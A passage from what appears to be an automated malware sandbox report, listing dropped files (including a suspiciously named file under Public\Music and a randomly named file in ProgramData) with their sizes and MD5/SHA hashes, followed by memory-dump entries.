4f626f3753f8cc2c398378c15e74506ea58bc2e79e3d4f3c031a7f8ab6be9182

SHA512
d10a38f2cd4eb1561c85aa35b106a64deb3abdc4e423b1626df52c14082b5a1b16f8e812875cc039d4d27324f6dbbd7ad6b2a9b84b2b9c31b885b676b1a7ae62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c858a4e27c0855512946ba2037967300

SHA1
c5e1e6fa0ddc81476f70c46534e7ed2a65d98f6d

SHA256
d5e4ca06ad890fd1426b4c27caa74b6ef84d14e2601a2ff163979449042daf2a

SHA512
0e88258297a26a091aed28c091342c9cf7528301291092ac6d830a55c7df4933ea07c5a3d913e66131bc9c6d11e55b9cc9d8c6d07fc6282fe09afe2bc9a6390b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0d10ad2d41a9d1552aaebab7d75ad626

SHA1
a9182ca0edf06ac732a1791af4f1337c32d36e75

SHA256
6379fdd6b6c6dda60b4b6e330a1d4da9b6b40f73f9926794396c33b2496341f5

SHA512
758e3015f26b563228749afc573259e57749420c8ef900b0e1530d7ebaba7c172fb6bed523cb555f8f47f4b42316d8026eaf314392e2be6003625432cc176036

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1alhrlf.n0a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Music\SystemProcessHost.SystemProcesses

Filesize
537KB

MD5
461f29adf1c3ec76588235194e13bdcd

SHA1
76cf092bf81a01d0709ba1efa66b9e5907315305

SHA256
f234befba70f313b7ff602c9b4fd52eedc05d5ef316967c1554a497b3f62f612

SHA512
be294ccef508ff3745d3641d37c95f159a2aed5072fa0266573335b83aa4e4f2f293f71b5203e8c38a0f206816723905a3f7f192ec2e7778767e8d8eead99451

Download Submit
C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tSTq06Bu1TNUVU8DHmb4TtL9TmS7H2.brk

Filesize
73KB

MD5
47b2f35c5fc5395e4926b4bf47739c57

SHA1
e02646b382b384ef9815a4a0af8347246e34e8ce

SHA256
cf484e3d44093c29bd689e81553ebe7f182249a4f4bfb5453c177408df6502fb

SHA512
3b3cf11806fb8b12b99b58ea4b74f342abffc0d9afe3cfc601b0875b15ff5eb8105830c6dc56f222ec4b0b98681fbe67a1494b4472478c58ba1934ee750d4b00

Download Submit
memory/732-15-0x00007FFBE7180000-0x00007FFBE7C42000-memory.dmp

Filesize
10.8MB

Download
memory/732-24-0x0000025DDEA10000-0x0000025DDEA1A000-memory.dmp

Filesize
40KB

Download
memory/732-23-0x0000025DDE9F0000-0x0000025DDEA02000-memory.dmp

Filesize
72KB

Download
memory/732-21-0x00007FFBE7180000-0x00007FFBE7C42000-memory.dmp

Filesize
10.8MB

Download
memory/732-17-0x00007FFBE7180000-0x00007FFBE7C42000-memory.dmp

Filesize
10.8MB

Download
memory/732-16-0x00007FFBE7183000-0x00007FFBE7185000-memory.dmp

Filesize
8KB

Download
memory/732-2-0x00007FFBE7183000-0x00007FFBE7185000-memory.dmp

Filesize
8KB

Download
memory/732-14-0x00007FFBE7180000-0x00007FFBE7C42000-memory.dmp

Filesize
10.8MB

Download
memory/732-13-0x00007FFBE7180000-0x00007FFBE7C42000-memory.dmp

Filesize
10.8MB

Download
memory/732-99-0x00007FFBE7180000-0x00007FFBE7C42000-memory.dmp

Filesize
10.8MB

Download
memory/732-12-0x0000025DC3CA0000-0x0000025DC3CC2000-memory.dmp

Filesize
136KB

Download
memory/2416-42-0x0000023075D10000-0x0000023075E86000-memory.dmp

Filesize
1.5MB

Download
memory/2416-43-0x00000230760A0000-0x00000230762AA000-memory.dmp

Filesize
2.0MB

Download